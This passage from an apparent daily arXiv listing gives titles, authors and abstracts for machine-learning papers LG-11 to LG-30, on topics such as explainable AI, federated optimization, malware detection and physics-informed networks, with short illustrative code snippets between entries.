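    for t, loss in enumerate(losses):
        if loss > baseline + threshold:
            high += 1
            if high >= patience:
                points.append(t)              # trigger: expand capacity here
                baseline, high = loss, 0      # adopt the new regime as baseline
        else:
            high = 0
            baseline = (1 - alpha) * baseline + alpha * loss  # smooth tracking
    return points

# Loss is low on domain A, then jumps when domain B arrives at step 5.
losses = [0.20, 0.18, 0.19, 0.17, 0.18, 1.30, 1.25, 1.28, 0.40, 0.35]
points = expansion_points(losses)  # fires once, patience steps after the jump
```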
[LG-11] Position: Explainable AI is Causality in Disguise
Link: https://arxiv.org/abs/2603.28597
Authors: Amir-Hossein Karimi
Subjects: Machine Learning (cs.LG)
Comments:
Abstract:The demand for Explainable AI (XAI) has triggered an explosion of methods, producing a landscape so fragmented that we now rely on surveys of surveys. Yet, fundamental challenges persist: conflicting metrics, failed sanity checks, and unresolved debates over robustness and fairness. The only consensus on how to achieve explainability is a lack of one. This has led many to point to the absence of a ground truth for defining “the” correct explanation as the main culprit. This position paper posits that the persistent discord in XAI arises not from an absent ground truth but from a ground truth that exists, albeit as an elusive and challenging target: the causal model that governs the relevant system. By reframing XAI queries about data, models, or decisions as causal inquiries, we prove the necessity and sufficiency of causal models for XAI. We contend that without this causal grounding, XAI remains unmoored. Ultimately, we encourage the community to converge around advanced concept and causal discovery to escape this entrenched uncertainty.
[LG-12] Optimistic Actor-Critic with Parametric Policies for Linear Markov Decision Processes
Link: https://arxiv.org/abs/2603.28595
Authors: Max Qiushi Lin,Reza Asad,Kevin Tan,Haque Ishfaq,Csaba Szepesvari,Sharan Vaswani
Subjects: Machine Learning (cs.LG); Machine Learning (stat.ML)
Comments:
Abstract:Although actor-critic methods have been successful in practice, their theoretical analyses have several limitations. Specifically, existing theoretical work either sidesteps the exploration problem by making strong assumptions or analyzes impractical methods with complicated algorithmic modifications. Moreover, the actor-critic methods analyzed for linear MDPs often employ natural policy gradient (NPG) and construct “implicit” policies without explicit parameterization. Such policies are computationally expensive to sample from, making the environment interactions inefficient. To that end, we focus on finite-horizon linear MDPs and propose an optimistic actor-critic framework that uses parametric log-linear policies. In particular, we introduce a tractable logit-matching regression objective for the actor. For the critic, we use approximate Thompson sampling via Langevin Monte Carlo to obtain optimistic value estimates. We prove that the resulting algorithm achieves \widetilde{\mathcal{O}}(\epsilon^{-4}) and \widetilde{\mathcal{O}}(\epsilon^{-2}) sample complexity in the on-policy and off-policy setting, respectively. Our results match prior theoretical works in achieving the state-of-the-art sample complexity, while our algorithm is more aligned with practice.
[LG-13] Physics-Informed Framework for Impact Identification in Aerospace Composites
Link: https://arxiv.org/abs/2603.28593
Authors: Natália Ribeiro Marinho,Richard Loendersloot,Jan Willem Wiegman,Frank Grooteman,Tiedo Tinga
Subjects: Machine Learning (cs.LG); Applied Physics (physics.app-ph)
Comments:
Abstract:This paper introduces a novel physics-informed impact identification (Phy-ID) framework. The proposed method integrates observational, inductive, and learning biases to combine physical knowledge with data-driven inference in a unified modelling strategy, achieving physically consistent and numerically stable impact identification. The physics-informed approach structures the input space using physics-based energy indicators, constrains admissible solutions via architectural design, and enforces governing relations via hybrid loss formulations. Together, these mechanisms limit non-physical solutions and stabilise inference under degraded measurement conditions. A disjoint inference formulation is used as a representative use case to demonstrate the framework’s capabilities, in which impact velocity and impactor mass are inferred through decoupled surrogate models, and impact energy is computed by enforcing kinetic energy consistency. Experimental evaluations show mean absolute percentage errors below 8% for inferred impact velocity and impactor mass and below 10% for impact energy. Additional analyses confirm stable performance under reduced data availability and increased measurement noise, as well as generalisation for out-of-distribution cases across pristine and damaged regimes when damaged responses are included in training. These results indicate that the systematic integration of physics-informed biases enables reliable, physically consistent, and data-efficient impact identification, highlighting the potential of the approach for practical monitoring systems.
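The kinetic-energy consistency step above is a one-liner: velocity and mass are inferred separately, and the energy estimate is forced to satisfy E = 0.5 * m * v^2. A minimal sketch with illustrative values (not the paper's data):

```python
# Kinetic-energy consistency between independently inferred quantities.

def impact_energy(mass_kg, velocity_ms):
    """Kinetic energy in joules from inferred impactor mass and velocity."""
    return 0.5 * mass_kg * velocity_ms ** 2

E = impact_energy(2.0, 3.0)  # hypothetical 2 kg impactor at 3 m/s -> 9.0 J
```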
[LG-14] Unrestrained Simplex Denoising for Discrete Data. A Non-Markovian Approach Applied to Graph Generation
Link: https://arxiv.org/abs/2603.28572
Authors: Yoann Boget,Alexandros Kalousis
Subjects: Machine Learning (cs.LG)
Comments: Simplex Denoising
Abstract:Denoising models such as Diffusion or Flow Matching have recently advanced generative modeling for discrete structures, yet most approaches operate directly in the discrete state space, causing abrupt state changes. We introduce simplex denoising, a simple yet effective generative framework that operates on the probability simplex. The key idea is a non-Markovian noising scheme in which, for a given clean data point, noisy representations at different times are conditionally independent. While preserving the theoretical guarantees of denoising-based generative models, our method removes unnecessary constraints, thereby improving performance and simplifying the formulation. Empirically, unrestrained simplex denoising surpasses strong discrete diffusion and flow-matching baselines across synthetic and real-world graph benchmarks. These results highlight the probability simplex as an effective framework for discrete generative modeling.
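One simple way to realise the conditional-independence property described above (our construction, not necessarily the paper's scheme) is to mix a clean one-hot point with an independent Dirichlet draw at each query time, so every noisy copy stays on the simplex and depends only on the clean point.

```python
# Toy simplex noising with conditionally independent noisy copies.
import random

random.seed(1)

def dirichlet(k, alpha=1.0):
    """Sample a point on the (k-1)-simplex via normalised Gamma draws."""
    g = [random.gammavariate(alpha, 1.0) for _ in range(k)]
    s = sum(g)
    return [v / s for v in g]

def noisy_copy(one_hot, t):
    """t=1 -> clean point, t=0 -> pure noise; draws are independent across calls."""
    noise = dirichlet(len(one_hot))
    return [t * c + (1 - t) * n for c, n in zip(one_hot, noise)]

clean = [0.0, 1.0, 0.0]           # discrete state as a vertex of the simplex
x_a = noisy_copy(clean, 0.8)
x_b = noisy_copy(clean, 0.8)      # independent of x_a given `clean`
```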
[LG-15] Mixture-Model Preference Learning for Many-Objective Bayesian Optimization
Link: https://arxiv.org/abs/2603.28410
Authors: Manisha Dubey,Sebastiaan De Peuter,Wanrong Wang,Samuel Kaski
Subjects: Machine Learning (cs.LG); Machine Learning (stat.ML)
Comments: 18 pages, 9 figures
Abstract:Preference-based many-objective optimization faces two obstacles: an expanding space of trade-offs and heterogeneous, context-dependent human value structures. Towards this, we propose a Bayesian framework that learns a small set of latent preference archetypes rather than assuming a single fixed utility function, modelling them as components of a Dirichlet-process mixture with uncertainty over both archetypes and their weights. To query efficiently, we design hybrid queries that target information about (i) mode identity and (ii) within-mode trade-offs. Under mild assumptions, we provide a simple regret guarantee for the resulting mixture-aware Bayesian optimization procedure. Empirically, our method outperforms standard baselines on synthetic and real-world many-objective benchmarks, and mixture-aware diagnostics reveal structure that regret alone fails to capture.
[LG-16] Label-efficient Training Updates for Malware Detection over Time
Link: https://arxiv.org/abs/2603.28396
Authors: Luca Minnei,Cristian Manca,Giorgio Piras,Angelo Sotgiu,Maura Pintor,Daniele Ghiani,Davide Maiorca,Giorgio Giacinto,Battista Biggio
Subjects: Machine Learning (cs.LG); Cryptography and Security (cs.CR)
Comments: Submitted to IEEE Transactions on Information Forensics and Security
Abstract:Machine Learning (ML)-based detectors are becoming essential to counter the proliferation of malware. However, common ML algorithms are not designed to cope with the dynamic nature of real-world settings, where both legitimate and malicious software evolve. This distribution drift causes models trained under static assumptions to degrade over time unless they are continuously updated. Regularly retraining these models, however, is expensive, since labeling newly acquired data requires costly manual analysis by security experts. To reduce labeling costs and address distribution drift in malware detection, prior work explored active learning (AL) and semi-supervised learning (SSL) techniques. Yet, existing studies (i) are tightly coupled to specific detector architectures and restricted to a specific malware domain, resulting in non-uniform comparisons; and (ii) lack a consistent methodology for analyzing the distribution drift, despite the critical sensitivity of the malware domain to temporal changes. In this work, we bridge this gap by proposing a model-agnostic framework that evaluates an extensive set of AL and SSL techniques, isolated and combined, for Android and Windows malware detection. We show that these techniques, when combined, can reduce manual annotation costs by up to 90% across both domains while achieving comparable detection performance to full-labeling retraining. We also introduce a methodology for feature-level drift analysis that measures feature stability over time, showing its correlation with the detector performance. Overall, our study provides a detailed understanding of how AL and SSL behave under distribution drift and how they can be successfully combined, offering practical insights for the design of effective detectors over time.
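The AL side of such pipelines can be sketched with one common strategy (uncertainty sampling; the paper evaluates many and this is not necessarily its chosen one): spend the labeling budget on samples whose scores sit closest to the decision boundary, and let confident predictions pass through as pseudo-labels.

```python
# Toy budget split between manual labeling and pseudo-labeling.

def split_budget(scores, budget):
    """Return (indices for manual labeling, indices to pseudo-label).

    `scores` are model probabilities of being malware in [0, 1]; the
    `budget` most uncertain samples (closest to 0.5) go to the analyst.
    """
    ranked = sorted(range(len(scores)), key=lambda i: abs(scores[i] - 0.5))
    manual = sorted(ranked[:budget])
    auto = sorted(ranked[budget:])
    return manual, auto

scores = [0.02, 0.97, 0.55, 0.48, 0.91, 0.10]   # invented detector scores
manual, auto = split_budget(scores, budget=2)
```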
[LG-17] Machine Learning-Assisted High-Dimensional Matrix Estimation
Link: https://arxiv.org/abs/2603.28346
Authors: Wan Tian,Hui Yang,Zhouhui Lian,Lingyue Zhang,Yijie Peng
Subjects: Machine Learning (cs.LG); Machine Learning (stat.ML)
Comments:
Abstract:Efficient estimation of high-dimensional matrices, including covariance and precision matrices, is a cornerstone of modern multivariate statistics. Most existing studies have focused primarily on the theoretical properties of the estimators (e.g., consistency and sparsity), while largely overlooking the computational challenges inherent in high-dimensional settings. Motivated by recent advances in learning-based optimization methods, which integrate data-driven structures with classical optimization algorithms, we explore high-dimensional matrix estimation assisted by machine learning. Specifically, for the optimization problem of high-dimensional matrix estimation, we first present a solution procedure based on the Linearized Alternating Direction Method of Multipliers (LADMM). We then introduce learnable parameters and model the proximal operators in the iterative scheme with neural networks, thereby improving estimation accuracy and accelerating convergence. Theoretically, we first prove the convergence of LADMM, and then establish the convergence, convergence rate, and monotonicity of its reparameterized counterpart; importantly, we show that the reparameterized LADMM enjoys a faster convergence rate. Notably, the proposed reparameterization theory and methodology are applicable to the estimation of both high-dimensional covariance and precision matrices. We validate the effectiveness of our method by comparing it with several classical optimization algorithms across different structures and dimensions of high-dimensional matrices.
[LG-18] Key-Embedded Privacy for Decentralized AI in Biomedical Omics
Link: https://arxiv.org/abs/2603.28334
Authors: Rongyu Zhang,Hongyu Dong,Gaole Dai,Ziqi Qiao,Shenli Zheng,Yuan Zhang,Aosong Cheng,Xiaowei Chi,Jincai Luo,Pin Li,Li Du,Dan Wang,Yuan Du,Xudong Xing,Jianxu Chen,Shanghang Zhang
Subjects: Machine Learning (cs.LG); Distributed, Parallel, and Cluster Computing (cs.DC)
Comments:
Abstract:The rapid adoption of data-driven methods in biomedicine has intensified concerns over privacy, governance, and regulation, limiting raw data sharing and hindering the assembly of representative cohorts for clinically relevant AI. This landscape necessitates practical, efficient privacy solutions, as cryptographic defenses often impose heavy overhead and differential privacy can degrade performance, leading to sub-optimal outcomes in real-world settings. Here, we present a lightweight federated learning method, INFL, based on Implicit Neural Representations that addresses these challenges. Our approach integrates plug-and-play, coordinate-conditioned modules into client models, embeds a secret key directly into the architecture, and supports seamless aggregation across heterogeneous sites. Across diverse biomedical omics tasks, including cohort-scale classification in bulk proteomics, regression for perturbation prediction in single-cell transcriptomics, and clustering in spatial transcriptomics and multi-omics with both public and private data, we demonstrate that INFL achieves strong, controllable privacy while maintaining utility, preserving the performance necessary for downstream scientific and clinical applications.
[LG-19] Physics-Informed Neural Networks for Predicting Hydrogen Sorption in Geological Formations: Thermodynamically Constrained Deep Learning Integrating Classical Adsorption Theory
Link: https://arxiv.org/abs/2603.28328
Authors: Mohammad Nooraiepour,Mohammad Masoudi,Zezhang Song,Helge Hellevang
Subjects: Machine Learning (cs.LG); Geophysics (physics.geo-ph)
Comments:
Abstract:Accurate prediction of hydrogen sorption in fine-grained geological materials is essential for evaluating underground hydrogen storage capacity, assessing caprock integrity, and characterizing hydrogen migration in subsurface energy systems. Classical isotherm models perform well at the individual-sample level but fail when generalized across heterogeneous populations, with the coefficient of determination collapsing from 0.80-0.90 for single-sample fits to 0.09-0.38 for aggregated multi-sample datasets. We present a multi-scale physics-informed neural network framework that addresses this limitation by embedding classical adsorption theory and thermodynamic constraints directly into the learning process. The framework utilizes 1,987 hydrogen sorption isotherm measurements across clays, shales, coals, supplemented by 224 characteristic uptake measurements. A seven-category physics-informed feature engineering scheme generates 62 thermodynamically meaningful descriptors from raw material characterization data. The loss function enforces saturation limits, a monotonic pressure response, and Van’t Hoff temperature dependence via penalty weighting, while a three-phase curriculum-based training strategy ensures stable integration of competing physical constraints. An architecture-diverse ensemble of ten members provides calibrated uncertainty quantification, with post-hoc temperature scaling achieving target prediction interval coverage. The optimized PINN achieves R^2 = 0.9544, RMSE = 0.0484 mmol/g, and MAE = 0.0231 mmol/g on the held-out test set, with 98.6% monotonicity satisfaction and zero non-physical negative predictions. Physics-informed regularization yields a 10-15% cross-lithology generalization advantage over a well-tuned random forest under leave-one-lithology-out validation, confirming that thermodynamic constraints transfer meaningfully across geological boundaries.
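The monotonic-pressure-response constraint above can be sketched as a penalty term (the weighting scheme is the paper's; this code is our illustration): any decrease in predicted uptake as pressure increases contributes to the loss, pushing the model toward physically valid isotherms.

```python
# Toy monotonicity penalty over predicted uptake at increasing pressures.

def monotonicity_penalty(uptake_by_pressure):
    """Sum of violations where uptake drops between consecutive pressures."""
    return sum(max(0.0, a - b)
               for a, b in zip(uptake_by_pressure, uptake_by_pressure[1:]))

ok  = [0.01, 0.05, 0.09, 0.11]   # monotone isotherm: no penalty
bad = [0.01, 0.08, 0.06, 0.11]   # dip at the third point is penalised
```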
[LG-20] FairGC: Fairness-aware Graph Condensation IJCNN2026
Link: https://arxiv.org/abs/2603.28321
Authors: Yihan Gao,Chenxi Huang,Wen Shi,Ke Sun,Ziqi Xu,Xikun Zhang,Mingliang Hou,Renqiang Luo
Subjects: Machine Learning (cs.LG)
Comments: 6 pages, IJCNN 2026 accepted
Abstract:Graph condensation (GC) has become a vital strategy for scaling Graph Neural Networks by compressing massive datasets into small, synthetic node sets. While current GC methods effectively maintain predictive accuracy, they are primarily designed for utility and often ignore fairness constraints. Because these techniques are bias-blind, they frequently capture and even amplify demographic disparities found in the original data. This leads to synthetic proxies that are unsuitable for sensitive applications like credit scoring or social recommendations. To solve this problem, we introduce FairGC, a unified framework that embeds fairness directly into the graph distillation process. Our approach consists of three key components. First, a Distribution-Preserving Condensation module synchronizes the joint distributions of labels and sensitive attributes to stop bias from spreading. Second, a Spectral Encoding module uses Laplacian eigen-decomposition to preserve essential global structural patterns. Finally, a Fairness-Enhanced Neural Architecture employs multi-domain fusion and a label-smoothing curriculum to produce equitable predictions. Rigorous evaluations on four real-world datasets show that FairGC provides a superior balance between accuracy and fairness. Our results confirm that FairGC significantly reduces disparity in Statistical Parity and Equal Opportunity compared to existing state-of-the-art condensation models. The codes are available at this https URL.
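The Statistical Parity metric referenced above has a standard form worth making concrete: the gap in positive-prediction rates between the two sensitive groups (the data below is invented for illustration).

```python
# Statistical parity difference over binary predictions and a binary group.

def statistical_parity_difference(preds, groups):
    """Absolute gap in positive-prediction rate between sensitive groups."""
    rate = {}
    for g in set(groups):
        members = [p for p, gg in zip(preds, groups) if gg == g]
        rate[g] = sum(members) / len(members)
    a, b = sorted(rate)
    return abs(rate[a] - rate[b])

preds  = [1, 0, 1, 1, 0, 0, 1, 0]   # hypothetical model outputs
groups = [0, 0, 0, 0, 1, 1, 1, 1]   # sensitive attribute per node
spd = statistical_parity_difference(preds, groups)  # 0.75 vs 0.25 -> 0.5
```

A fairness-aware condensation method aims to keep this gap small on models trained from the synthetic graph.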
[LG-21] Taming the Instability: A Robust Second-Order Optimizer for Federated Learning over Non-IID Data
Link: https://arxiv.org/abs/2603.28316
Authors: Yuanqiao Zhang,Tiantian He,Yuan Gao,Yixin Wang,Yew-Soon Ong,Maoguo Gong,A.K. Qin,Hui Li
Subjects: Machine Learning (cs.LG)
Comments: 33 pages, preprint, under review
Abstract:In this paper, we present Federated Robust Curvature Optimization (FedRCO), a novel second-order optimization framework designed to improve convergence speed and reduce communication cost in Federated Learning systems under statistical heterogeneity. Existing second-order optimization methods are often computationally expensive and numerically unstable in distributed settings. In contrast, FedRCO addresses these challenges by integrating an efficient approximate curvature optimizer with a provable stability mechanism. Specifically, FedRCO incorporates three key components: (1) a Gradient Anomaly Monitor that detects and mitigates exploding gradients in real-time, (2) a Fail-Safe Resilience protocol that resets optimization states upon numerical instability, and (3) a Curvature-Preserving Adaptive Aggregation strategy that safely integrates global knowledge without erasing the local curvature geometry. Theoretical analysis shows that FedRCO can effectively mitigate instability and prevent unbounded updates while preserving optimization efficiency. Extensive experiments show that FedRCO achieves superior robustness against diverse non-IID scenarios while achieving higher accuracy and faster convergence than both state-of-the-art first-order and second-order methods.
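Component (1) above, the Gradient Anomaly Monitor, can be sketched minimally (the component name follows the abstract; thresholds and logic are our assumptions): track a running average of gradient norms and flag any step whose norm is non-finite or explodes past a multiple of that average, which would trigger the fail-safe reset.

```python
# Toy gradient-norm anomaly monitor; the norm stream is invented.
import math

def monitor(grad_norms, factor=5.0, alpha=0.2):
    """Flag steps whose gradient norm is NaN/inf or > factor * running average."""
    avg, flags = grad_norms[0], []
    for g in grad_norms:
        if not math.isfinite(g) or g > factor * avg:
            flags.append(True)                 # anomaly: trigger fail-safe reset
        else:
            flags.append(False)
            avg = (1 - alpha) * avg + alpha * g  # update baseline on clean steps
    return flags

norms = [1.0, 1.2, 0.9, 40.0, 1.1, float("nan")]
flags = monitor(norms)  # the spike and the NaN are both flagged
```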
[LG-22] LIBERO-Para: A Diagnostic Benchmark and Metrics for Paraphrase Robustness in VLA Models
链接: https://arxiv.org/abs/2603.28301
作者: Chanyoung Kim,Minwoo Kim,Minseok Kang,Hyunwoo Kim,Dahuin Jung
类目: Machine Learning (cs.LG)
*备注: 32 pages, 28 figures
Abstract:Vision-Language-Action (VLA) models achieve strong performance in robotic manipulation by leveraging pre-trained vision-language backbones. However, in downstream robotic settings, they are typically fine-tuned with limited data, leading to overfitting to specific instruction formulations and leaving robustness to paraphrased instructions underexplored. To study this gap, we introduce LIBERO-Para, a controlled benchmark that independently varies action expressions and object references for fine-grained analysis of linguistic generalization. Across seven VLA configurations (0.6B-7.5B), we observe consistent performance degradation of 22-52 pp under paraphrasing. This degradation is primarily driven by object-level lexical variation: even simple synonym substitutions cause large drops, indicating reliance on surface-level matching rather than semantic grounding. Moreover, 80-96% of failures arise from planning-level trajectory divergence rather than execution errors, showing that paraphrasing disrupts task identification. Binary success rate treats all paraphrases equally, obscuring whether models perform consistently across difficulty levels or rely on easier cases. To address this, we propose PRIDE, a metric that quantifies paraphrase difficulty using semantic and syntactic factors. Our benchmark and corresponding code are available at: this https URL
[LG-23] OptINC: Optical In-Network-Computing for Scalable Distributed Learning
链接: https://arxiv.org/abs/2603.28290
作者: Sijie Fei,Grace Li Zhang,Bing Li,Ulf Schlichtmann
类目: Machine Learning (cs.LG); Hardware Architecture (cs.AR)
*备注:
Abstract:Distributed learning is widely used for training large models on large datasets by distributing parts of the model or dataset across multiple devices and aggregating the computed results for subsequent computations or parameter updates. Existing communication algorithms for distributed learning such as ring all-reduce result in heavy communication overhead between servers. Since communication in large-scale systems uses optical fibers, we propose an Optical In-Network-Computing (OptINC) architecture to offload the computation in servers onto the optical interconnects. To execute gradient averaging and quantization in the optical domain, we incorporate optical devices such as Mach-Zehnder-Interferometers (MZIs) into the interconnects. Such a de facto optical neural network (ONN) can effectively reduce the communication overhead in existing distributed training solutions. To reduce dataset complexity for training this neural network, a preprocessing algorithm implemented in the optical domain is also proposed. Hardware cost is lowered by approximating the weight matrices of the optical neural network with unitary and diagonal matrices, while the accuracy is maintained by a proposed hardware-aware training algorithm. The proposed solution was evaluated on real distributed learning tasks, including ResNet50 on CIFAR-100, and a LLaMA-based network on Wikipedia-1B. In both cases, the proposed framework can achieve comparable training accuracy to the ring all-reduce baseline, while eliminating communication overhead.
[LG-24] Corruption-robust Offline Multi-agent Reinforcement Learning From Human Feedback
链接: https://arxiv.org/abs/2603.28281
作者: Andi Nika,Debmalya Mandal,Parameswaran Kamalaruban,Adish Singla,Goran Radanović
类目: Machine Learning (cs.LG)
*备注:
Abstract:We consider robustness against data corruption in offline multi-agent reinforcement learning from human feedback (MARLHF) under a strong-contamination model: given a dataset D of trajectory-preference tuples (each preference being an n-dimensional binary label vector representing each of the n agents’ preferences), an \epsilon-fraction of the samples may be arbitrarily corrupted. We model the problem using the framework of linear Markov games. First, under a uniform coverage assumption - where every policy of interest is sufficiently represented in the clean (prior to corruption) data - we introduce a robust estimator that guarantees an O(\epsilon^{1-o(1)}) bound on the Nash equilibrium gap. Next, we move to the more challenging unilateral coverage setting, in which only a Nash equilibrium and its single-player deviations are covered. In this case, our proposed algorithm achieves an O(\sqrt{\epsilon}) bound on the Nash gap. Both of these procedures, however, suffer from intractable computation. To address this, we relax our solution concept to coarse correlated equilibria (CCE). Under the same unilateral coverage regime, we derive a quasi-polynomial-time algorithm whose CCE gap scales as O(\sqrt{\epsilon}). To the best of our knowledge, this is the first systematic treatment of adversarial data corruption in offline MARLHF.
[LG-25] MuonEq: Balancing Before Orthogonalization with Lightweight Equilibration
链接: https://arxiv.org/abs/2603.28254
作者: Da Chang,Qiankun Shi,Lvgang Zhang,Yu Li,Ruijie Zhang,Yao Lu,Yongxiang Liu,Ganzhao Yuan
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Orthogonalized-update optimizers such as Muon improve training of matrix-valued parameters, but existing extensions mostly act either after orthogonalization by rescaling updates or before it with heavier whitening-based preconditioners. We introduce MuonEq, a lightweight family of pre-orthogonalization equilibration schemes for Muon in three forms: two-sided row/column normalization (RC), row normalization (R), and column normalization (C). These variants rebalance the momentum matrix before finite-step Newton–Schulz using row/column squared-norm statistics and only \mathcal{O}(m+n) auxiliary state. We show that finite-step orthogonalization is governed by input spectral properties, especially stable rank and condition number, and that row/column normalization is a zeroth-order whitening surrogate that removes marginal scale mismatch. For the hidden matrix weights targeted by MuonEq, the row-normalized variant (R) is the natural default and preserves the \widetilde{\mathcal{O}}(T^{-1/4}) stationarity guarantee of Muon-type methods. In LLaMA2 pretraining on C4, the default (R) variant consistently outperforms Muon on 130M and 350M models, yielding faster convergence and lower validation perplexity.
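The (R)-variant pipeline can be sketched as row normalization of the momentum matrix followed by a finite-step Newton-Schulz iteration; the simple cubic iteration below is a stand-in for the quintic polynomial typically used in Muon-style optimizers, so the details are illustrative:

```python
import numpy as np

def row_normalize(m, eps=1e-8):
    """(R) variant sketch: rescale each row of the momentum matrix by its
    l2 norm before orthogonalization (a zeroth-order whitening surrogate
    that removes row-scale mismatch)."""
    norms = np.linalg.norm(m, axis=1, keepdims=True)
    return m / (norms + eps)

def newton_schulz_orth(m, steps=15):
    """Cubic Newton-Schulz iteration X <- 1.5 X - 0.5 X X^T X, driving the
    singular values of X toward 1. Dividing by the Frobenius norm first
    puts all singular values in (0, 1], where the iteration converges."""
    x = m / (np.linalg.norm(m) + 1e-8)
    for _ in range(steps):
        x = 1.5 * x - 0.5 * x @ x.T @ x
    return x
```

The update an optimizer would apply is `newton_schulz_orth(row_normalize(momentum))`; better-conditioned inputs (the point of the equilibration) need fewer iterations to reach an orthogonal factor.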
[LG-26] Detecting the Unexpected: AI-Driven Anomaly Detection in Smart Bridge Monitoring
链接: https://arxiv.org/abs/2603.28225
作者: Rahul Jaiswal,Joakim Hellum,Halvor Heiberg
类目: Machine Learning (cs.LG)
*备注: 6 pages, 14 figures
Abstract:Bridges are critical components of national infrastructure and smart cities. Therefore, smart bridge monitoring is essential for ensuring public safety and preventing catastrophic failures or accidents. Traditional bridge monitoring methods rely heavily on human visual inspections, which are time-consuming and prone to subjectivity and error. This paper proposes an artificial intelligence (AI)-driven anomaly detection approach for smart bridge monitoring. Specifically, a simple machine learning (ML) model is developed using real-time sensor data collected by the iBridge sensor devices installed on a bridge in Norway. The proposed model is evaluated against different ML models. Experimental results demonstrate that the density-based spatial clustering of applications with noise (DBSCAN)-based model outperforms in accurately detecting the anomalous events (bridge accident). These findings indicate that the proposed model is well-suited for smart bridge monitoring and can enhance public safety by enabling the timely detection of unforeseen incidents.
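The DBSCAN noise criterion behind a detector of this kind can be illustrated in a few lines; the toy version below applies only the core-point/noise test and omits cluster expansion (parameter values and the function name are illustrative, not taken from the paper):

```python
import numpy as np

def dbscan_noise_flags(x, eps=0.5, min_pts=5):
    """Minimal sketch of the DBSCAN noise criterion for anomaly detection:
    a reading is flagged when its eps-neighborhood (itself included)
    contains fewer than min_pts samples. Full DBSCAN additionally expands
    clusters, so border points attached to a core point are not noise;
    this sketch keeps only the density test."""
    d = np.linalg.norm(x[:, None, :] - x[None, :, :], axis=-1)
    neighbor_counts = (d <= eps).sum(axis=1)
    return neighbor_counts < min_pts
```

Applied to windows of sensor features, the flagged low-density readings would correspond to candidate anomalous events such as an accident on the bridge.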
[LG-27] Variational Neurons in Transformers for Language Modeling
链接: https://arxiv.org/abs/2603.28219
作者: Yves Ruffenach
类目: Machine Learning (cs.LG)
*备注: 11 pages, 3 figures
Abstract:Transformers for language modeling usually rely on deterministic internal computation, with uncertainty expressed mainly at the output layer. We introduce variational neurons into Transformer feed-forward computation so that uncertainty becomes part of the internal computation itself. Concretely, we replace deterministic feed-forward units with local variational units based on EVE while preserving the overall Transformer backbone. We evaluate this design in compact next-token language-modeling settings. We compare deterministic and variational variants with both predictive and probabilistic criteria. Alongside negative log-likelihood, perplexity and accuracy, we analyze calibration, conditional variance, mutual information and latent-usage statistics. The resulting picture is clear. Variational neurons integrate stably into Transformers, preserve strong predictive performance and produce informative uncertainty signals. The experiments also show that task quality, useful depth and internal stability are distinct properties. These results establish variational Transformers as a practical form of uncertainty-aware language modeling. They show that Transformers can predict with an explicit internal structure of uncertainty, which supports stronger probabilistic evaluation and a more informative analysis of model behavior.
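A local variational unit of the kind described might be sketched with the standard reparameterization trick; the linear-map parameterization and names below are assumptions, and the paper's EVE-based units may differ:

```python
import numpy as np

def variational_unit(h, w_mu, w_logvar, rng):
    """Hypothetical local variational feed-forward unit: each pre-activation
    is sampled from a Gaussian whose mean and log-variance are separate
    linear maps of the input (reparameterization trick), so uncertainty
    lives inside the feed-forward computation rather than only at the
    output layer. Returns the stats needed for a KL regularizer."""
    mu = h @ w_mu
    logvar = h @ w_logvar
    eps = rng.standard_normal(mu.shape)
    z = mu + np.exp(0.5 * logvar) * eps  # stochastic pre-activation
    return np.maximum(z, 0.0), mu, logvar  # ReLU on the sample
```

The per-unit variance `exp(logvar)` is what makes internal uncertainty signals (conditional variance, mutual information) directly readable from the model.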
[LG-28] A Perturbation Approach to Unconstrained Linear Bandits
链接: https://arxiv.org/abs/2603.28201
作者: Andrew Jacobsen,Dorian Baudry,Shinji Ito,Nicolò Cesa-Bianchi
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: 50 pages
Abstract:We revisit the standard perturbation-based approach of Abernethy et al. (2008) in the context of unconstrained Bandit Linear Optimization (uBLO). We show the surprising result that in the unconstrained setting, this approach effectively reduces Bandit Linear Optimization (BLO) to a standard Online Linear Optimization (OLO) problem. Our framework improves on prior work in several ways. First, we derive expected-regret guarantees when our perturbation scheme is combined with comparator-adaptive OLO algorithms, leading to new insights about the impact of different adversarial models on the resulting comparator-adaptive rates. We also extend our analysis to dynamic regret, obtaining the optimal \sqrt{P_T} path-length dependencies without prior knowledge of P_T. We then develop the first high-probability guarantees for both static and dynamic regret in uBLO. Finally, we discuss lower bounds on the static regret, and prove the folklore \Omega(\sqrt{dT}) rate for adversarial linear bandits on the unit Euclidean ball, which is of independent interest.
[LG-29] A Deep Reinforcement Learning Framework for Closed-loop Guidance of Fish Schools via Virtual Agents
链接: https://arxiv.org/abs/2603.28200
作者: Takato Shibayama,Hiroaki Kawashima
类目: Robotics (cs.RO); Machine Learning (cs.LG); Populations and Evolution (q-bio.PE)
*备注: 18 pages, 8 figures
Abstract:Guiding collective motion in biological groups is a fundamental challenge in understanding social interaction rules and developing automated systems for animal management. In this study, we propose a deep reinforcement learning (RL) framework for the closed-loop guidance of fish schools using virtual agents. These agents are controlled by policies trained via Proximal Policy Optimization (PPO) in simulation and deployed in physical experiments with rummy-nose tetras (Petitella bleheri), enabling real-time interaction between artificial agents and live individuals. To cope with the stochastic behavior of live individuals, we design a composite reward function to balance directional guidance with social cohesion. Our systematic evaluation of visual parameters shows that a white background and larger stimulus sizes maximize guidance efficacy in physical trials. Furthermore, evaluation across group sizes revealed that while the system demonstrates effective guidance for groups of five individuals, this capability markedly degrades as group size increases to eight. This study highlights the potential of deep RL for automated guidance of biological collectives and identifies challenges in maintaining artificial influence in larger groups.
[LG-30] Policy-Controlled Generalized Share: A General Framework with a Transformer Instantiation for Strictly Online Switching-Oracle Tracking
链接: https://arxiv.org/abs/2603.28198
作者: Hongkai Hu
类目: Machine Learning (cs.LG); Statistical Finance (q-fin.ST)
*备注: 44 pages, 6 figures, 5 tables, 1 algorithm. Includes appendix and reproducibility-oriented experiments
